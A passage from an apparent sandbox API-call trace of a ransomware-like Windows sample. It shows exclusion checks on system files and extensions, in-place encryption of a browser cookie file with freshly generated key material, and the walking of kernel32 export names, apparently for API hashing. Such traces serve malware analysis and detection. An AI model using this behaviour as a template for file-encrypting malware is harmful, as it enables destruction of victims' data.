returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="ntuser.dat.log") returned -1 [0180.939] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="thumbs.db") returned -1 [0180.940] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh", lpString2="Bootfont.bin") returned -1 [0180.940] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh") returned 41 [0180.940] lstrcmpiW (lpString1="mVmbcfh", lpString2="lnk") returned 1 [0180.940] lstrcmpiW (lpString1="mVmbcfh", lpString2="exe") returned 1 [0180.940] lstrcmpiW (lpString1="mVmbcfh", lpString2="sys") returned -1 [0180.940] lstrcmpiW (lpString1="mVmbcfh", lpString2="dll") returned 1 [0180.940] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.940] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh") returned 41 [0180.940] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.940] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh" [0180.940] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mvmbcfh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.940] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=347) returned 1 [0180.940] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.940] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.941] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.941] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.941] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.941] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.941] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.942] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.942] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.942] CloseHandle (hObject=0x280) returned 1 [0180.942] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.942] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.943] CloseHandle (hObject=0x0) returned 0 [0180.943] CloseHandle (hObject=0x27c) returned 1 [0180.943] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.943] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.944] GetTickCount () returned 0x1134ac7 [0180.944] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.944] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.944] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.944] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.944] lstrlenA (lpString="kernel32.dll") returned 12 [0180.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.944] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.945] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.945] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.945] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.945] lstrlenA (lpString="ADDATOMA") returned 8 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.945] lstrlenA (lpString="ADDATOMW") returned 8 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.945] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.945] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.945] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.945] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.945] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.945] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.945] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.945] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.945] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.945] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.945] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.945] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.945] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.945] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.945] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.946] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.946] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.946] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.946] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.946] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.946] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.946] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.946] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.946] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.946] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.946] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.946] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.946] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.946] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.946] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.946] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.946] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.946] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.946] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.947] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.947] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.947] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.947] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.947] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.947] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.947] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.947] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.947] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.947] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.947] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.947] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.947] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.947] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.947] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.947] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.947] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.947] lstrlenA (lpString="BEEP") returned 4 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.947] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.947] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.948] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.948] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.948] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.948] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.948] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.948] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.948] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.948] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.948] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.948] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.948] lstrlenA (lpString="CANCELIO") returned 8 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.948] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.948] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.948] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.948] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.948] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.948] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.948] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.948] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.948] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.949] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.949] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.949] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.949] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.949] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.949] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.949] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.949] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.949] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.949] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.949] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.949] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.949] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.949] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.950] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.950] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.950] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.950] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.950] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.950] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.950] lstrlenA 